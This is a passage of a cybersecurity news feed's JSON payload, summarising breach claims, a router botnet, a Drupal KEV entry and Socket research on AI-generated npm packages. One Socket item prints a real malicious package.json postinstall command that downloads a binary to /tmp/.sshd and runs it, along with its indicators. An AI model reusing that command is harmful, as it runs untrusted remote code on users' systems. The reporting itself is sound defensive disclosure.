[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6xj-Bmf7UMf1JTqhSxoeEmhgwzuTQadl8YytG99OYbo":3,"$f6ximpnJsNd5_Lf3G00HEZ33pOIyuvS0umlqXrntW0nE":192},{"items":4},[5,11,17,23,29,35,41,47,53,59,65,70,76,80,86,92,98,104,110,116,122,128,134,140,144,150,156,162,167,172,177,182,187],{"id":6,"name":7,"slug":8,"description":9,"icon":9,"sort_order":10},"80544778-fabb-4dcd-aa35-17492e5dcf4f","Vulnerabilities","vulnerabilities",null,10,{"id":12,"name":13,"slug":14,"description":15,"icon":9,"sort_order":16},"574f766a-fb3f-487c-8d2c-0720ae75471b","Zero-day","zero-day","Zero-day exploits and active exploitation",11,{"id":18,"name":19,"slug":20,"description":21,"icon":9,"sort_order":22},"26b0b636-0e31-4db1-bffb-61bdf9f20a58","Supply Chain","supply-chain","Supply chain attacks, dependency poisoning, build compromise",12,{"id":24,"name":25,"slug":26,"description":27,"icon":9,"sort_order":28},"6cbdd207-aaa1-4176-9534-e156b125e917","Nation-state","nation-state","State-sponsored campaigns, APT operations, cyber warfare",13,{"id":30,"name":31,"slug":32,"description":33,"icon":9,"sort_order":34},"c5eccf7c-abbc-4bd3-bbed-e6da5cba8e73","Incident Response","incident-response","IR playbooks, post-incident analysis, forensics",14,{"id":36,"name":37,"slug":38,"description":39,"icon":9,"sort_order":40},"2c8f44d4-b56e-47cf-9677-04f22c9ee78d","Identity & Access","identity-access","IAM, MFA bypass, credential theft, authentication",15,{"id":42,"name":43,"slug":44,"description":45,"icon":9,"sort_order":46},"d6f63bb8-0801-486a-be7f-171400700454","IoT\u002FOT","iot-ot","IoT\u002FOT security, industrial control systems, embedded devices",16,{"id":48,"name":49,"slug":50,"description":51,"icon":9,"sort_order":52},"0493c7e9-989a-4692-b4e6-136f5ec09675","Cryptography","cryptography","Encryption, quantum threats, protocol weaknesses",17,{"id":54,"name":55,"slug":56,"description":57,"icon":9,"sort_order":58},"53f9c4b6-8bc6-4964-9169-d09e5cd41d72","Compliance","compliance","GDPR, NIS2, SEC rules, 
regulatory frameworks",18,{"id":60,"name":61,"slug":62,"description":63,"icon":9,"sort_order":64},"ade75414-7914-4e23-a450-48b64546ee70","Open Source","open-source","OSS vulnerabilities, package security, dependency risks",19,{"id":66,"name":67,"slug":68,"description":9,"icon":9,"sort_order":69},"2e06f76c-d5b9-4f54-9eef-4d3447b10730","Breaches","breaches",20,{"id":71,"name":72,"slug":73,"description":74,"icon":9,"sort_order":75},"3f0f8451-91df-4b6c-9a73-ef3b2509b7f1","GDPR","gdpr","EU General Data Protection Regulation",30,{"id":77,"name":78,"slug":79,"description":9,"icon":9,"sort_order":75},"89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5","Malware","malware",{"id":81,"name":82,"slug":83,"description":84,"icon":9,"sort_order":85},"5d60956f-4c0c-47c3-8db1-94240f816ce1","CCPA\u002FCPRA","ccpa-cpra","California Consumer Privacy Act",31,{"id":87,"name":88,"slug":89,"description":90,"icon":9,"sort_order":91},"fbace4ad-a9f5-407c-b73c-88cd9d221ecc","HIPAA","hipaa","US Health Insurance Portability and Accountability Act",32,{"id":93,"name":94,"slug":95,"description":96,"icon":9,"sort_order":97},"4fd32ef4-29b8-4ee4-b88f-ecfb77fbf9c1","NIS2","nis2","EU Network and Information Security Directive",33,{"id":99,"name":100,"slug":101,"description":102,"icon":9,"sort_order":103},"09099139-1092-4178-99da-99332cd1582f","PCI-DSS","pci-dss","Payment Card Industry Data Security Standard",34,{"id":105,"name":106,"slug":107,"description":108,"icon":9,"sort_order":109},"ca424fe9-cd56-4073-9d6a-9bb050d4bb8f","DORA","dora","Digital Operational Resilience Act",35,{"id":111,"name":112,"slug":113,"description":114,"icon":9,"sort_order":115},"d95477d7-eb04-4fad-a2dc-be1428040ce7","Privacy Fines","privacy-fines","DPA enforcement actions and penalties",36,{"id":117,"name":118,"slug":119,"description":120,"icon":9,"sort_order":121},"23e81061-ab06-449f-8807-cbe4bc305045","UK Data Protection","uk-data-protection","UK GDPR and Data Protection Act 
2018",37,{"id":123,"name":124,"slug":125,"description":126,"icon":9,"sort_order":127},"f22671ea-092b-4568-aede-526bb16dedd5","EU AI Act","eu-ai-act","EU AI Act — artificial intelligence regulation and compliance",38,{"id":129,"name":130,"slug":131,"description":132,"icon":9,"sort_order":133},"ef42c16c-f41b-4794-8148-5fa5cb7b41b0","Cyber Resilience Act","eu-cyber-resilience-act","EU Cyber Resilience Act (CRA) — product cybersecurity requirements",39,{"id":135,"name":136,"slug":137,"description":138,"icon":9,"sort_order":139},"6e35e56d-89a7-4c72-9501-954aa9dd3449","EU Cybersecurity Act","eu-cybersecurity-act","EU Cybersecurity Act — ENISA mandate and certification schemes",40,{"id":141,"name":142,"slug":143,"description":9,"icon":9,"sort_order":139},"7d8b5ab8-ea0b-4ced-ae97-ec251b86993a","Ransomware","ransomware",{"id":145,"name":146,"slug":147,"description":148,"icon":9,"sort_order":149},"233dac9c-6b5b-4d83-9d6b-902ec3ffd7f2","DSA\u002FDMA","dsa-dma","EU Digital Services Act \u002F Digital Markets Act",41,{"id":151,"name":152,"slug":153,"description":154,"icon":9,"sort_order":155},"217d3263-c763-41ca-875e-06901f522fe0","NIST","nist","NIST CSF, 800-series, US federal cybersecurity standards",42,{"id":157,"name":158,"slug":159,"description":160,"icon":9,"sort_order":161},"a53e88d4-7e4c-481a-b387-3ea4c84f4919","SEC Cyber Rules","sec-cyber","SEC cyber disclosure rules and enforcement",43,{"id":163,"name":164,"slug":165,"description":9,"icon":9,"sort_order":166},"c5c77cdb-f7d7-4990-9436-c81dcbff1163","Policy","policy",50,{"id":168,"name":169,"slug":170,"description":9,"icon":9,"sort_order":171},"02371804-cf6d-4449-98de-f1a2d4d9b266","Tools","tools",60,{"id":173,"name":174,"slug":175,"description":9,"icon":9,"sort_order":176},"c70f3a41-2f0c-4608-870d-b8cbcd8be076","Cloud Security","cloud-security",70,{"id":178,"name":179,"slug":180,"description":9,"icon":9,"sort_order":181},"839da5c1-3c34-47e2-9499-f7201640e3ac","AI 
Security","ai-security",80,{"id":183,"name":184,"slug":185,"description":9,"icon":9,"sort_order":186},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",90,{"id":188,"name":189,"slug":190,"description":9,"icon":9,"sort_order":191},"614132b8-5837-4952-b8b5-c6c9a32a1d85","Privacy","privacy",100,{"items":193,"nextOffset":69,"hasMore":378},[194,216,231,247,261,281,301,315,331,347,364,380,397,414,426,440,460,478,495,512],{"id":195,"title":196,"slug":197,"url":198,"summary":199,"ai_summary":200,"parent_article_id":9,"relation_type":9,"image_url":201,"verify_count":202,"avg_score":9,"score_count":202,"published_at":203,"ingested_at":204,"source":205,"category":209,"tags":210,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"fc2aa533-2f4a-4943-a4ef-a78265a5f8a9","🚨WhatsApp zero-day exploit allegedly advertised for sale\n\nA threat actor on an underground forum...","whatsapp-zero-day-exploit-allegedly-advertised-for-sale-a-threat-actor-on-an-und-a46602","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058257939362627626","🚨WhatsApp zero-day exploit allegedly advertised for sale\n\nA threat actor on an underground forum is claiming to sell a WhatsApp zero-day exploit allegedly capable of installing malware or backdoors through private messages.\n\nThe actor claims the exploit works on phones and https:\u002F\u002Ft.co\u002FPcdVSP82Uq","A threat actor is advertising a WhatsApp zero-day exploit for sale on an underground forum, claiming it can install malware or backdoors via private messages. The exploit allegedly works on both phones and desktop platforms. 
Details remain limited pending further investigation.","https:\u002F\u002Fpbs.twimg.com\u002Fmedia\u002FHJBmowuXAAAMDOf.jpg",0,"2026-05-23T18:45:07+00:00","2026-05-23T19:00:07.471572+00:00",{"id":206,"url":207,"name":208},"cbacbff4-323e-4947-9f55-74f2c7c7d1be","https:\u002F\u002Fapi.twitter.com\u002F2\u002Ftweets\u002Fsearch\u002Frecent","X \u002F Twitter",{"id":12,"icon":9,"name":13,"slug":14,"description":15},[211,212,213],{"id":6,"slug":8,"name":7},{"id":77,"slug":79,"name":78},{"id":183,"slug":185,"name":184},1,false,{"id":217,"title":218,"slug":219,"url":220,"summary":221,"ai_summary":222,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":223,"ingested_at":224,"source":225,"category":226,"tags":227,"ioc_count":202,"has_awareness_lesson":215,"awareness_lesson_id":9},"88b3789e-22c1-4c88-bd0b-8ffc2e74d02d","🚨🇨🇱 Chilean Fire Department System Allegedly Breached: VIPER Platform Records and Internal Doc...","chilean-fire-department-system-allegedly-breached-viper-platform-records-and-int-d9f9bd","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058217725382561879","🚨🇨🇱 Chilean Fire Department System Allegedly Breached: VIPER Platform Records and Internal Documents Exposed\n\nhttps:\u002F\u002Ft.co\u002Fs6fHnnKxCo","The Chilean Fire Department's VIPER platform has been reportedly breached, with threat actors claiming to have accessed internal records and documents. The breach exposes sensitive operational data from a critical emergency response organization. 
The incident highlights vulnerabilities in government infrastructure security.","2026-05-23T16:05:20+00:00","2026-05-23T17:00:08.224568+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[228,229,230],{"id":24,"slug":26,"name":25},{"id":30,"slug":32,"name":31},{"id":183,"slug":185,"name":184},{"id":232,"title":233,"slug":234,"url":235,"summary":236,"ai_summary":237,"parent_article_id":9,"relation_type":9,"image_url":238,"verify_count":202,"avg_score":9,"score_count":202,"published_at":239,"ingested_at":240,"source":241,"category":242,"tags":243,"ioc_count":202,"has_awareness_lesson":215,"awareness_lesson_id":9},"9d590759-1ff7-481e-b07f-777171f7ca18","🚨🇿🇦 Alleged data breach of South African Revenue Service (SARS) by Nullsec https:\u002F\u002Ft.co\u002FciUMwl...","alleged-data-breach-of-south-african-revenue-service-sars-by-nullsec-https-t-co--3af464","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058214877831762189","🚨🇿🇦 Alleged data breach of South African Revenue Service (SARS) by Nullsec https:\u002F\u002Ft.co\u002FciUMwlwwXO","A threat actor or group operating under the moniker Nullsec has alleged a data breach of South Africa's Revenue Service (SARS). The claim includes purported exfiltration of sensitive data. 
Details remain limited pending verification of the breach's authenticity and scope.","https:\u002F\u002Fpbs.twimg.com\u002Fmedia\u002FHJA_ge6XQAAiH2Y.jpg","2026-05-23T15:54:01+00:00","2026-05-23T16:00:07.504385+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[244,245,246],{"id":188,"slug":190,"name":189},{"id":24,"slug":26,"name":25},{"id":183,"slug":185,"name":184},{"id":248,"title":249,"slug":250,"url":251,"summary":252,"ai_summary":253,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":254,"ingested_at":240,"source":255,"category":256,"tags":257,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"b8cc999d-a068-43c6-8b3c-2691560886cb","🚨🇺🇸 WisERP Allegedly Targeted: 1.5M U.S. ERP Customer Records Advertised in Auction\n\nhttps:\u002F\u002Ft...","wiserp-allegedly-targeted-1-5m-u-s-erp-customer-records-advertised-in-auction-ht-b9df2f","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058212320468193384","🚨🇺🇸 WisERP Allegedly Targeted: 1.5M U.S. ERP Customer Records Advertised in Auction\n\nhttps:\u002F\u002Ft.co\u002FQDozfTkExf","WisERP, a U.S. enterprise resource planning (ERP) software provider, has allegedly been breached with approximately 1.5 million customer records now being advertised for sale on the dark web. The breach appears to affect a significant number of U.S. organizations that rely on the platform for critical business operations. 
This represents a supply-chain risk to all downstream customers and users of affected WisERP deployments.","2026-05-23T15:43:51+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[258,259,260],{"id":18,"slug":20,"name":19},{"id":188,"slug":190,"name":189},{"id":183,"slug":185,"name":184},{"id":262,"title":263,"slug":264,"url":265,"summary":266,"ai_summary":267,"parent_article_id":9,"relation_type":9,"image_url":268,"verify_count":202,"avg_score":9,"score_count":202,"published_at":269,"ingested_at":270,"source":271,"category":275,"tags":276,"ioc_count":280,"has_awareness_lesson":215,"awareness_lesson_id":9},"76343cc5-0302-48ea-8ee1-aec0f1f9a5fc","RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers","rondodox-botnet-exploits-critical-2018-vulnerability-to-hijack-asus-routers-88d656","https:\u002F\u002Fhackread.com\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers\u002F","Cybersecurity firm VulnCheck reveals hackers are using a critical 2018 vulnerability to bypass authentication and hack over a million ASUS routers.","VulnCheck discovered that the RondoDox botnet is actively exploiting CVE-2018-5999, a critical 2018 vulnerability in ASUS routers, to bypass authentication and hijack over 1 million devices. The vulnerability (CVSS 9.8\u002F10) allows unauthenticated attackers to modify router settings by manipulating the ateCommand_flag parameter. 
Though exploit code has been public since 2018, real-world exploitation only began in May 2026, with RondoDox using the compromised routers to launch DDoS attacks.","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers-2.jpg","2026-05-23T11:16:40+00:00","2026-05-23T12:00:08.7051+00:00",{"id":272,"url":273,"name":274},"669622ac-ebeb-40b1-b887-4586dd6bb884","https:\u002F\u002Fwww.hackread.com\u002Ffeed\u002F","Hackread",{"id":77,"icon":9,"name":78,"slug":79,"description":9},[277,278,279],{"id":6,"slug":8,"name":7},{"id":42,"slug":44,"name":43},{"id":183,"slug":185,"name":184},3,{"id":282,"title":283,"slug":284,"url":285,"summary":286,"ai_summary":287,"parent_article_id":9,"relation_type":9,"image_url":288,"verify_count":202,"avg_score":9,"score_count":202,"published_at":289,"ingested_at":290,"source":291,"category":295,"tags":296,"ioc_count":300,"has_awareness_lesson":215,"awareness_lesson_id":9},"f1b72fff-ed9c-408d-b98e-4f021d170880","Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects","malicious-postinstall-hook-found-across-700-github-repositories-including-packag-4fdf9d","https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include the same malicious postinstall script. The script attempted to download a Linux binary from a GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, make it executable, and run it in the background. The affected packages were all Composer packages, but the malicious code was not added to composer.json. Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code. 
That cross-ecosystem placement is notable because developers and security teams reviewing PHP dependencies may focus on Composer metadata while overlooking package.json lifecycle hooks bundled inside the package. Socket’s AI scanner detected the campaign across eight branch-tracking package versions: Package Affected Version moritz-sauer-13\u002Fsilverstripe-cms-theme dev-master crosiersource\u002Fcrosierlib-base dev-master devdojo\u002Fwave dev-main devdojo\u002Fgenesis dev-main katanaui\u002Fkatana dev-main elitedevsquad\u002Fsidecar-laravel 3.x-dev r2luna\u002Fbrain dev-main baskarcm\u002Ftzi-chat-ui dev-main Socket’s AI scanner flagged all eight affected package artifacts after identifying the same suspicious install-time behavior across the set. We identified multiple packages with a postinstall hook that downloads an external binary and immediately executes it, often placing the file at \u002Ftmp\u002F.sshd, with weakened TLS verification and background execution. Broader GitHub Search Shows Hundreds of References # During the course of this investigation, Socket found that the campaign was not limited to the initial Packagist packages flagged by the AI scanner. A GitHub code search for the attacker-controlled account parikhpreyash4 returned hundreds of public code results approximately 17 hours after the first detection, including many Node.js repositories. Socket has not yet confirmed how many of those results represent distinct compromises, forks, duplicate package artifacts, or cached references. However, the volume of results tied to the same attacker infrastructure suggests a broader campaign involving the same package.json postinstall payload. The confirmed Packagist findings remain the clearest evidence available so far: eight PHP packages contained the same install-time command that downloaded gvfsd-network from the attacker-controlled GitHub Releases URL, wrote it to \u002Ftmp\u002F.sshd, made it executable, and launched it in the background. 
Follow-up GitHub searches indicate the same infrastructure may have been reused across a much wider set of JavaScript projects. Identical Payload Delivery # The malicious postinstall script was identical across the confirmed package artifacts: curl-skL https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network-o \u002Ftmp\u002F.sshd2>\u002Fdev\u002Fnull &&chmod+x \u002Ftmp\u002F.sshd && \u002Ftmp\u002F.sshd & The command has several high-risk characteristics: It uses curl -k, disabling TLS certificate verification. It downloads a binary named gvfsd-network from GitHub Releases. It writes the binary to \u002Ftmp\u002F.sshd, a hidden filename that resembles an SSH daemon. It suppresses error output with 2>\u002Fdev\u002Fnull. It makes the file executable with chmod +x. It runs the binary in the background using &. Socket researchers were unable to retrieve the second-stage binary during follow-up because the GitHub-hosted payload was no longer available. However, the first-stage behavior is sufficient to classify the packages as malicious. The script downloads and executes an unauthenticated remote binary during installation with no integrity check, while suppressing errors and hiding the executable under a system-like filename. Malicious Commits in Upstream GitHub Repositories # moritz-sauer-13\u002Fsilverstripe-cms-theme Malicious commit: 7825479 Cleanup status: The hook was still present on master when checked. crosiersource\u002Fcrosierlib-base Malicious commit: 551c319 Cleanup status: The hook was still present on master when checked. thedevdojo\u002Fwave Malicious commit: 8f9127a Cleanup status: Reverted by 5afe6da. thedevdojo\u002Fgenesis Malicious commit: fe7b1cd Cleanup status: Reverted by 3be1f20. katanaui\u002Fkatana Malicious commit: a32f9e1 Cleanup status: Reverted by f679252. 
elitedevsquad\u002Fsidecar-laravel Malicious commit: ed6fd36 Cleanup status: Reverted by b1f5c53, titled security: revert malicious postinstall payload. r2luna\u002Fbrain Malicious commit: 85eca91 Cleanup status: Reverted by 421a1d5, titled security: revert malicious postinstall payload. baskarcm\u002Ftzi-chat-ui Malicious commit: 58fa0b2 Cleanup status: The hook was still present on main when checked. # The confirmed Packagist findings appear to stem from malicious commits made directly to upstream GitHub repositories. In each case, the attacker added the same package.json postinstall script to a repository that was tracked by Packagist. Once Packagist updated its branch-tracking package versions, those malicious repository states became infected package artifacts. The campaign was not necessarily aimed at Packagist itself. The attacker targeted source repositories, and Packagist reflected those changes through dev-main, dev-master, and 3.x-dev package versions. Several maintainers later reverted the malicious commits, which caused the current branch-tracking package views to move back to clean artifacts. The malicious code was placed in package.json, not composer.json, targeting repositories that included JavaScript build tooling alongside PHP code. In PHP projects, that placement can be easy to miss if defenders focus only on Composer metadata while overlooking JavaScript lifecycle scripts bundled in the same repository. Socket reported the affected packages to Packagist, which immediately removed them. Branch-Tracking Versions Complicate Response # Most affected versions were development branches, including dev-main, dev-master, and 3.x-dev. These are branch-tracking versions rather than immutable releases. This also affected remediation. Packagist temporarily deleted the affected package entries, but noted that branch-tracking packages could be restored on the next package update unless the upstream repository was fixed. 
For defenders, this means the affected version label alone is not enough. The relevant artifact should be tied to the observed commit or archive state when available. Potential for Execution # Two of the affected packages account for most of the practical risk. devdojo\u002Fwave is an open source Laravel SaaS starter kit with roughly 6,400 GitHub stars. devdojo\u002Fgenesis, from the same publisher, has about 1,300 stars and 9,100 Packagist installs. Its Packagist metadata describes it as a Laravel starter kit built with Tailwind CSS, Alpine.js, Laravel, Livewire, Folio, and Volt. Starter kits are the worst case for this attack pattern. The repository becomes the developer's project, so the malicious package.json lands at the project root, where npm install runs its postinstall script directly. For the other affected packages, which are libraries pulled into vendor\u002F, the postinstall hook does not fire from a top-level npm install, since npm only runs scripts for packages declared in the root project's dependencies. The remaining six affected Packagist packages appear to have much smaller adoption and more niche or personal use cases. That does not make the compromise benign, but it does concentrate the most likely real-world exposure in the starter kit projects. Recommendations # Teams using Packagist packages that include JavaScript build tooling should inspect bundled package.json files, not only composer.json. This is especially important for branch-tracking Composer dependencies, where the package contents can change as the upstream branch moves. Socket flagged the affected package artifacts as malicious based on their install-time behavior. The detected pattern matched a coordinated supply chain campaign: unrelated packages contained the same lifecycle hook, the same GitHub Releases payload URL, the same hidden local filename, and the same background execution chain. 
Even without the second-stage binary, the malicious installer is enough to warrant blocking. It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background. Indicators of Compromise # GitHub account: parikhpreyash4 GitHub repository: parikhpreyash4\u002Fsystemd-network-helper-aa5c751f Payload URL: https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network Payload File Path: \u002Ftmp\u002F.sshd Suspicious command fragments: curl -skL chmod +x \u002Ftmp\u002F.sshd \u002Ftmp\u002F.sshd &","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages on Packagist, where upstream repositories were modified to include malicious postinstall scripts in package.json files. The scripts attempted to download a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, and execute it in the background with disabled TLS verification. 
A broader GitHub search revealed hundreds of additional references to the same attacker infrastructure across Node.js repositories, suggesting the campaign extends far beyond the confirmed Packagist findings.","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002Fd66a69ec89dc89742b33b6b178982263b5f44386-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-05-22T21:03:29.112+00:00","2026-05-22T22:00:21.049859+00:00",{"id":292,"url":293,"name":294},"30adb488-0f84-4546-a81c-ab52a7489b84","https:\u002F\u002Fsocket.dev\u002Fapi\u002Fblog\u002Ffeed.atom","SocketDev",{"id":18,"icon":9,"name":19,"slug":20,"description":21},[297,298,299],{"id":77,"slug":79,"name":78},{"id":60,"slug":62,"name":61},{"id":183,"slug":185,"name":184},2,{"id":302,"title":303,"slug":304,"url":305,"summary":306,"ai_summary":307,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":308,"ingested_at":309,"source":310,"category":311,"tags":312,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"fdb6209c-f668-4c74-ae62-ebb67cbcecb4","RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Cata...","rt-cisacyber-we-added-drupal-core-sql-injection-vulnerability-cve-2026-9082-to-o-02c8ea","https:\u002F\u002Fx.com\u002FCISAgov\u002Fstatus\u002F2057893782339592352","RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Catalog. Visit https:\u002F\u002Ft.co\u002FmyxOwap1Tf for more…","CISA has added CVE-2026-9082, a SQL injection vulnerability in Drupal core, to its Known Exploited Vulnerabilities (KEV) catalog. The addition indicates this vulnerability is being actively exploited in the wild and organizations should prioritize patching. 
Administrators running Drupal should apply available security updates immediately.","2026-05-22T18:38:06+00:00","2026-05-22T19:00:12.71472+00:00",{"id":206,"url":207,"name":208},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[313,314],{"id":6,"slug":8,"name":7},{"id":60,"slug":62,"name":61},{"id":316,"title":317,"slug":318,"url":319,"summary":320,"ai_summary":321,"parent_article_id":9,"relation_type":9,"image_url":322,"verify_count":202,"avg_score":9,"score_count":202,"published_at":323,"ingested_at":324,"source":325,"category":326,"tags":327,"ioc_count":202,"has_awareness_lesson":215,"awareness_lesson_id":9},"971838a3-7c15-45ba-85b7-e1d3fcaac759","AI Has Taken Over Open Source","ai-has-taken-over-open-source-079c96","https:\u002F\u002Fsocket.dev\u002Fblog\u002Fai-has-taken-over-open-source?utm_medium=feed","I’ve spent a lot of time looking at what the data reveals about open source, from the speed at which open source alternatives emerge to how maintainer compensation compares with the broader software industry. I’m interested in what the data says, not in predictions based on anecdotes. At Socket, I've had the privilege of accessing our massive database across all major ecosystems, including npm, PyPI, Go, and Rust. We essentially replicate all open source packages, including the very fringe cases. Within minutes, a nefarious package is replicated, analyzed, and reported to our customers. This unparalleled, real-time visibility into the entire software supply chain has surfaced unique and often surprising insights as our industry has rushed into the AI era. Socket was created just before “vibe coding” was coined as a term, and we have had a front-row seat to observe how it is impacting the open source community. 
I found three interesting insights that I want to share with you today, all related to AI coding trends: the number of packages on npm is growing exponentially, pull requests and contributions are increasingly seen negatively by maintainers, and dependency shopping is on a downward spiral. AI is driving the production and consumption of open source, as well as fundamentally transforming the dynamics between maintainers and contributors. The Rising Tide of Packages # Last year, I took a deep dive into Socket's package database, and I developed a theory that npm might have reached its peak. The explosive surge that defined the 2013 to 2016 period seems to have leveled off. I remember that a decade ago, the developer community was using the term \"JavaScript fatigue\" to describe the then-normal torrent of new tools and ways of working. Since then, the ecosystem has moved toward a more predictable cadence, and those familiar frustrations within the community have largely quieted down. Everything changed in January 2026. AI coding tools became so effective at producing working code, that they became the driver of many developers' workflow to produce side-projects, open source packages, automations, and enterprise source code. This is visible in open source ecosystems such as npm. I compiled the following chart from Socket’s database, where I spread all packages by their creation date over time, and measured how many such packages exist per creation-month. To ignore fake packages, dead packages, and other registry-abusing cases, I added a filter for packages that have at least 100 weekly downloads. Thus this counts the real and reusable packages. There is an unprecedented pattern going on. While it is possible the recent spike includes packages gaming the system for artificial popularity, we haven’t seen this kind of sudden growth in 15 years of npm. The immediate question is: where do they come from? How can there be this many? 
Even during the periods when there were swarms of prolific developers publishing as many packages as they humanly could, we did not reach the mark of 10,000 real and reusable packages per month. It seems like something superhuman is happening. This sparked my curiosity and I pondered how I could distinguish which of these packages were “written by AI”. Trying to differentiate between human machine output is a challenge that borders on a modern Turing test. That said, fortunately current AI coding tools are unusually fond of em dashes. So for the time being, they give themselves away easily. I measured the number of packages published recently, and the proportion of those which had em dashes in their README files, and the following chart was produced. (Please note that this was produced mid-May 2026, so the count of packages in May is still incomplete) It is normal to expect approximately 5% of em dash “background radiation” produced by humans, so the recent sharp increase in em dash usage (30%+) indicates that AI is indeed employed in the creation of new npm packages. It is more than doubling the number of packages per month. Maintenance Fatigue: PRs not welcome # AI coding tools are used not only for the creation of new packages but also for contributing pull requests to existing open source projects. Given the normalization of AI assistance in most IDEs, this is not surprising. What's new is the flood of low-quality and often automated pull requests, which bypass human interaction, spamming maintainers with noise. Maintainers of projects such as curl, Godot, Ghostty, tldraw, and others are now vocally describing contributions in a negative light. Some are resorting to disabling pull requests entirely, others are considering how contributor allowlists could be an answer. It was once standard practice in the open source community to use \"good first issue\" labels to encourage and onboard new programmers. 
Yet, this label is increasingly counterproductive, often attracting AI automation executing on a user's instruction. As a result, contributions are now often leveraged to boost online presence and popularity, eroding the culture of solidarity that historically defined the open source ethos. AI is reshaping the work of maintainers as much as it is reshaping the work of contributors. Maintainers are now using those tools to help reviewing pull requests, or to simply rewrite the contribution from scratch given the maintainer’s better-informed prompt. Software Supply Chain as a Black Box # We built Socket’s package search feature – free for everyone – to support “dependency shopping”. This is the process of searching for suitable dependencies, filtering away the fake and the unpopular, and assessing many other criteria. Let’s take a look at how this too was impacted by AI recently. What simple “health indicator” for dependency shopping could we probe? In modern software development, UI components for routine tasks like date selection are a fundamental requirement. However, when I examined Google Search trends for “date pickers” in the past 4 years, I discovered a surprisingly consistent decline: Based on the chart above, one might be inclined to conclude that React date pickers are on their way out of software being produced lately. Contrarily, the statistical data for downloads regarding this specific package reveals a conflicting narrative: react-datepicker usage is steadily growing, and even picking up more steam in 2026! Open source used to be consumed consciously, intentionally and informed by package popularity or human review. This is no longer true. Developers more and more rely on their AI coding tools to build entire features or products, and in the process include the packages deemed necessary. Packages themselves used to contain transitive dependencies that were hand-picked by maintainers. That is also no longer true. 
The result is that AI is now primarily in control of software supply chains. There are other fields disrupted by AI, such as image generation or the production of music, but software is uniquely impacted. AI is now driving both the production and consumption of open source software. AI-generated music ends in human ears, and AI-generated images mostly benefit humans, but AI-generated software is an ouroboros (a snake eating its own tail) which is just getting started. The software that AI writes is often good, and the open source packages it chooses for consumption are by and large better than what humans would choose. But the fact remains that the software supply chain is now an automated black box, fundamentally changing the landscape of security and transparency. It is not feasible to manually review every new dependency selection, and the pace of AI-accelerated productivity reduces the economic benefit of pausing to inspect the packages and their source code. The only viable solution to remain secure in this new world ridden with malware campaigns is to automate the scanning of third-party code to surface risk indicators based on how that code behaves. Developers are moving faster, tools are making more decisions on their behalf, and the supply chain is becoming too large and too automated for manual review to remain the primary defense. That does not mean open source is going away. It is human nature to share useful things with the wider community. But in a world where AI is helping produce, select, and install open source packages, automated analysis of third-party code becomes a baseline requirement for production software.","Socket's analysis reveals AI coding tools have fundamentally transformed npm's ecosystem, driving a 10x increase in package creation since January 2026, identifiable by linguistic markers like em dashes. 
